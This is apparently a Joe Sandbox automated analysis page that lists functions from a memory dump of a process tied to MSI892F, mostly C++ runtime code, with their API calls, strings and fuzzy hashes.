Instruction ID: e4f5cd6e7caf05600d0d70eb8ebb36a37218fb4a432bef036977ff78052521ac
Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction Fuzzy Hash: FEE0B672A11228EBCB15DB98C954E8AB2ACEB49B50B1545AAF605D3211D374DE40C7D1

Function 001C843F Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
Instruction ID: 23c8b95000aa57d67472e3938756409b17897703e93b6afc497da224d168f617
Opcode Fuzzy Hash: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
Instruction Fuzzy Hash: B5C08C34000A018BCE3E8A1082F1FAC3354F3B1782F800A8DC42A0BF42CB2FDC82D660

Function 00198790 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 349filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0019880D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00198860
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 0019886F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0019888B
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 0019896B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 00198977
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 001989B3
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 001989D2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 001989EF
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 00198A83
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00198ACE
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00198B1C
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 00198B4B

Strings

[InternetShortcut]URL=, xrefs: 0019889F
-_.~!*'();:@&=+$,/?#[], xrefs: 001988E7, 001988FE
URL Shortcut content:, xrefs: 00198A09
open, xrefs: 00198AC7, 00198AE3

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 2199533872-3004881174
Opcode ID: 30148cdcd402cc176001e67e92896af4813846028369014ad035d543a60f918f
Instruction ID: 78cf0f7d92d05c98af19a5cabd88ac667939ebcdb9382b4be46f221bb3aab9fb
Opcode Fuzzy Hash: 30148cdcd402cc176001e67e92896af4813846028369014ad035d543a60f918f
Instruction Fuzzy Hash: 26C14371A002459FEF20CF68CC85BBFBBB5EF96700F14412AE515AB2C1EB748A45C7A1

Function 001B7769 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(001F4AF8,00000FA0,?,?,001B7747), ref: 001B7775
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,001B7747), ref: 001B7780
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,001B7747), ref: 001B7791
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001B77A3
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001B77B1
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,001B7747), ref: 001B77D4
DeleteCriticalSection.KERNEL32(001F4AF8,00000007,?,?,001B7747), ref: 001B77F0
CloseHandle.KERNEL32(00000000,?,?,001B7747), ref: 001B7800

Strings

kernel32.dll, xrefs: 001B778C
WakeAllConditionVariable, xrefs: 001B77A9
api-ms-win-core-synch-l1-2-0.dll, xrefs: 001B777B
SleepConditionVariableCS, xrefs: 001B779D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 603dbbe93d1691179536ed670bb35086336970293a1955a9994975f1a7a4eef9
Instruction ID: e6aaa150c689c09d408fe2f0d7e617de4341320a694b3c38aaae112a158561be
Opcode Fuzzy Hash: 603dbbe93d1691179536ed670bb35086336970293a1955a9994975f1a7a4eef9
Instruction Fuzzy Hash: CC018F35B87712ABD7212B74BC0DE673BA8EBC5B52B050016F806D7AE0DFB0C881C665

Function 0019F010 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,08E011E3,?,00000000), ref: 0019F076
std::_Lockit::_Lockit.LIBCPMT ref: 0019F0B3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019F11D
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019F2B9
std::_Lockit::~_Lockit.LIBCPMT ref: 0019F376
Concurrency::cancel_current_task.LIBCPMT ref: 0019F39E

Strings

false, xrefs: 0019F1D6
bad locale name, xrefs: 0019F3A3
true, xrefs: 0019F1EC

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 975656625-1062449267
Opcode ID: 8c17cbdb6636c8ab398f9d59a71af11e8338e8eb8dd853967c3fbae925bd65fd
Instruction ID: 5e09ca942bdfc8c1f7a2c682f2bf683f4bd643fd580d7f7ed1876be810033b9f
Opcode Fuzzy Hash: 8c17cbdb6636c8ab398f9d59a71af11e8338e8eb8dd853967c3fbae925bd65fd
Instruction Fuzzy Hash: C6B171B1D04348DAEF20DFA4C9457DEBBF4BF15304F1481ADE454AB281E7759A48CB51

Function 00196A60 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,08E011E3,?,00000000), ref: 00196AC2
OpenProcess.KERNEL32(00000400,00000000,00000000,?,08E011E3,?,00000000), ref: 00196AE3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,08E011E3,?,00000000), ref: 00196B16
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,08E011E3,?,00000000), ref: 00196B27
CloseHandle.KERNEL32(00000000,?,08E011E3,?,00000000), ref: 00196B45
CloseHandle.KERNEL32(00000000,?,08E011E3,?,00000000), ref: 00196B61
CloseHandle.KERNEL32(00000000,?,08E011E3,?,00000000), ref: 00196B89
CloseHandle.KERNEL32(00000000,?,08E011E3,?,00000000), ref: 00196BA5
CloseHandle.KERNEL32(00000000,?,08E011E3,?,00000000), ref: 00196BC3
CloseHandle.KERNEL32(00000000,?,08E011E3,?,00000000), ref: 00196BDF

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: 3f0c0fc3b65a5db62f4e79b8b3c63bd90149fb1511a34470499fcaebb5245fa9
Instruction ID: 2511f9f9fa74d31b7b2bdd423c0f52fbf72d86a058e737187abd2b68c0d482c6
Opcode Fuzzy Hash: 3f0c0fc3b65a5db62f4e79b8b3c63bd90149fb1511a34470499fcaebb5245fa9
Instruction Fuzzy Hash: 90517AB0E01618ABDF10CFA9CD84BEEFBB5AF48724F244219E515B7280D7745905CBA8

Function 001B0834 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B083B

Part of subcall function 001A780A: __EH_prolog3.LIBCMT ref: 001A7811
Part of subcall function 001A780A: std::_Lockit::_Lockit.LIBCPMT ref: 001A781B
Part of subcall function 001A780A: std::_Lockit::~_Lockit.LIBCPMT ref: 001A788C

Strings

%d / %m / %y, xrefs: 001B0B9E
%b %d %H : %M : %S %Y, xrefs: 001B0AF3
%H : %M : %S, xrefs: 001B09F7
%H : %M, xrefs: 001B0980
%m / %d / %y, xrefs: 001B0937
%I : %M : %S %p, xrefs: 001B0BC5
:AM:am:PM:pm, xrefs: 001B0BD0

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: 9e1e98fec6968c3f3e96d1482e23b1132867485be4f2f89b03b8f74be6f713f7
Instruction ID: ac02bb6a7a3b402cd6b7a660a0e598cda1fa7959e5291a94ab368103f15b24c7
Opcode Fuzzy Hash: 9e1e98fec6968c3f3e96d1482e23b1132867485be4f2f89b03b8f74be6f713f7
Instruction Fuzzy Hash: 3BC1B07654010AAFDB1AEFA8C9A5DFF7BE8AB1D304F05051AFA46E7251D731DA00CB60

Function 001B59E2 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B59E9

Part of subcall function 0019C590: std::_Lockit::_Lockit.LIBCPMT ref: 0019C5BD
Part of subcall function 0019C590: std::_Lockit::_Lockit.LIBCPMT ref: 0019C5E0
Part of subcall function 0019C590: std::_Lockit::~_Lockit.LIBCPMT ref: 0019C608
Part of subcall function 0019C590: std::_Lockit::~_Lockit.LIBCPMT ref: 0019C6A7

Strings

%d / %m / %y, xrefs: 001B5D4C
%b %d %H : %M : %S %Y, xrefs: 001B5CA1
%H : %M : %S, xrefs: 001B5BA5
%H : %M, xrefs: 001B5B2E
%m / %d / %y, xrefs: 001B5AE5
%I : %M : %S %p, xrefs: 001B5D73
:AM:am:PM:pm, xrefs: 001B5D7E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: ec911987f73d37935be6e4113018024c30012fea1b06d073732ca3c7f1e1a516
Instruction ID: 4f46749d767f4336caa50bdb73d04ce362d9946fe6e89f53f57693e0f9a2e9ff
Opcode Fuzzy Hash: ec911987f73d37935be6e4113018024c30012fea1b06d073732ca3c7f1e1a516
Instruction Fuzzy Hash: F0C16176500509AFDB18DFA8C999FFB7BBEEB09300F15461AFA06A7255D730DA10CB60

Function 001B0C24 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B0C2B

Part of subcall function 0019B500: std::_Lockit::_Lockit.LIBCPMT ref: 0019B52D
Part of subcall function 0019B500: std::_Lockit::_Lockit.LIBCPMT ref: 0019B550
Part of subcall function 0019B500: std::_Lockit::~_Lockit.LIBCPMT ref: 0019B578
Part of subcall function 0019B500: std::_Lockit::~_Lockit.LIBCPMT ref: 0019B617

Strings

%d / %m / %y, xrefs: 001B0F8E
%b %d %H : %M : %S %Y, xrefs: 001B0EE3
%H : %M : %S, xrefs: 001B0DE7
%H : %M, xrefs: 001B0D70
%m / %d / %y, xrefs: 001B0D27
%I : %M : %S %p, xrefs: 001B0FB5
:AM:am:PM:pm, xrefs: 001B0FC0

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 48ef6e7a7c6532918e451268384600fe0ed851508bca9fe821ca206e7f84be11
Instruction ID: 30a8d62ded43eccb5c1b57a60bffbdf0832101e0161033304c57567dc0de51c0
Opcode Fuzzy Hash: 48ef6e7a7c6532918e451268384600fe0ed851508bca9fe821ca206e7f84be11
Instruction Fuzzy Hash: 4EC17F7650010AAFDB2ADFA8C995DFF3BE8AB1D700F15451EFA06A6291D730DE10CB60

Function 001965B0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00196090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 001960F4
Part of subcall function 00196090: GetLastError.KERNEL32 ref: 00196190

GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00196632
ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 0019668B
ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00196712
ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 001967F6
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0019686E
GetLastError.KERNEL32(?,00000000), ref: 001968C9
FreeLibrary.KERNEL32(?,?,00000000), ref: 0019691E

Strings

NtQueryInformationProcess, xrefs: 0019662C

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
String ID: NtQueryInformationProcess
API String ID: 253270903-2781105232
Opcode ID: 346b12d85b8fc37b9ccb8914daf2ecc1a93f04eade31ae1cb281a1a9c91c9d03
Instruction ID: c11b24f5de10335cf3beb065ea3bf38941838676f3392a16f1002d8b88fb58cc
Opcode Fuzzy Hash: 346b12d85b8fc37b9ccb8914daf2ecc1a93f04eade31ae1cb281a1a9c91c9d03
Instruction Fuzzy Hash: 6FB17070D11749DADB20CF64C9487AEBBF0EF58308F10465EE445A6690E7B9A6C8CBA1

Function 001AD491 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001AD498
_Maklocstr.LIBCPMT ref: 001AD501
_Maklocstr.LIBCPMT ref: 001AD513
_Maklocchr.LIBCPMT ref: 001AD52B
_Maklocchr.LIBCPMT ref: 001AD53B
_Getvals.LIBCPMT ref: 001AD55D

Part of subcall function 001A708B: _Maklocchr.LIBCPMT ref: 001A70BA
Part of subcall function 001A708B: _Maklocchr.LIBCPMT ref: 001A70D0

Strings

false, xrefs: 001AD4FC
true, xrefs: 001AD50E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: ff69f934ffc67c3034c36776ed4ca538b547ef0ea7299c4f670556f91fc9194a
Instruction ID: f19e03724b7110a7c07f9b3d3a9e43e6f673a109ff56ebf6bd59bcede20a2565
Opcode Fuzzy Hash: ff69f934ffc67c3034c36776ed4ca538b547ef0ea7299c4f670556f91fc9194a
Instruction Fuzzy Hash: F62171B5D04308AADF15EFA5E886ACF7B78AF15710F04801BF9159F192EB70D600CBA1

Function 0019C9C0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 480COMMON

Download Yara Rule

APIs

Part of subcall function 001A5C66: __EH_prolog3.LIBCMT ref: 001A5C6D
Part of subcall function 001A5C66: std::_Lockit::_Lockit.LIBCPMT ref: 001A5C78
Part of subcall function 001A5C66: std::locale::_Setgloballocale.LIBCPMT ref: 001A5C93
Part of subcall function 001A5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 001A5CE6

std::_Lockit::_Lockit.LIBCPMT ref: 0019CA1A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019CA80
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019CB4F

Part of subcall function 001A45A7: __EH_prolog3.LIBCMT ref: 001A45AE

std::_Lockit::~_Lockit.LIBCPMT ref: 0019CC00
LocalFree.KERNEL32(?,?,?,001EB6C9,00000000,001EB6C9), ref: 0019CD01
__cftoe.LIBCMT ref: 0019CE5E

Strings

bad locale name, xrefs: 0019CC41

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
String ID: bad locale name
API String ID: 2085124900-1405518554
Opcode ID: 5b8b33be9ea43ff1de393e7e429acac98f137909567eef3974d16a825ca7e388
Instruction ID: 3176e0d20c95e281104550a08603fce19894b2105594a6059033f4008ac18907
Opcode Fuzzy Hash: 5b8b33be9ea43ff1de393e7e429acac98f137909567eef3974d16a825ca7e388
Instruction Fuzzy Hash: EC129F71E00249DFDF10CFA8C985BAEBBF5EF19304F144169E855AB381E735AA04CBA1

Function 001BB22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 001BB34B
___TypeMatch.LIBVCRUNTIME ref: 001BB459
_UnwindNestedFrames.LIBCMT ref: 001BB5AB
CallUnexpected.LIBVCRUNTIME ref: 001BB5C6

Strings

csm, xrefs: 001BB269
csm, xrefs: 001BB2D6
csm, xrefs: 001BB382

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 37664c462ba2dfbcca4d552fd65b1bda2b200b58352f4cc25a992d29dd74f67c
Instruction ID: bcdd1beb746dbe8363d76eea9732d04d05abf6bda9827134fa152a72f2943b4a
Opcode Fuzzy Hash: 37664c462ba2dfbcca4d552fd65b1bda2b200b58352f4cc25a992d29dd74f67c
Instruction Fuzzy Hash: 35B17A71804209EFCF29DFA4C8C19EEBBB5FF24310B54415AF9116BA12D7B1EA51CB92

Function 001A0260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 001A0322
LocalAlloc.KERNEL32(00000040,?), ref: 001A0367
___std_exception_copy.LIBVCRUNTIME ref: 001A03DE
LocalFree.KERNEL32(?), ref: 001A041B
LocalFree.KERNEL32(?,?,?,?,?,08E011E3,08E011E3,?,?), ref: 001A0546

Strings

iostream, xrefs: 001A05A0
ios_base::failbit set, xrefs: 001A04B2

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Local$AllocFree$___std_exception_copy
String ID: ios_base::failbit set$iostream
API String ID: 2276494016-302468714
Opcode ID: 67dffdd2b8ba487294b8866d912520476bf38ff111f7f8ae2280a240ee92802b
Instruction ID: 3de81c2904f639a205e981a150beae44e257f812938f322dca7fa89a0a66460c
Opcode Fuzzy Hash: 67dffdd2b8ba487294b8866d912520476bf38ff111f7f8ae2280a240ee92802b
Instruction Fuzzy Hash: 60A1B0B5D01208DFDB09DF68D984BAEBBB5FF49310F10825EE815AB391DB709A44CB91

Function 0019BA30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000044,08E011E3,?,00000000), ref: 0019BA8B
std::_Lockit::_Lockit.LIBCPMT ref: 0019BAC8
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019BB35
__Getctype.LIBCPMT ref: 0019BB7E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019BBF2
std::_Lockit::~_Lockit.LIBCPMT ref: 0019BCAF

Strings

bad locale name, xrefs: 0019BCCD

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3635123611-1405518554
Opcode ID: 1b0de8f77215e0bed0f61fe74820d212da4f2a5df7d83fcb6f3ac38b5fa0b8ba
Instruction ID: e0844b94bcc74cc873b5f954ca39f768f746c01f7955a464dc7de38a83b5a05b
Opcode Fuzzy Hash: 1b0de8f77215e0bed0f61fe74820d212da4f2a5df7d83fcb6f3ac38b5fa0b8ba
Instruction Fuzzy Hash: 878175B1D05388DFEF20CFA8CA4579EBBF4AF15304F148199D444AB381EB759A44DB61

Function 0019C220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,08E011E3,?,00000000,?,?,?,?,?,?,?,00000000,001DABC5,000000FF), ref: 0019C264
std::_Lockit::_Lockit.LIBCPMT ref: 0019C29E
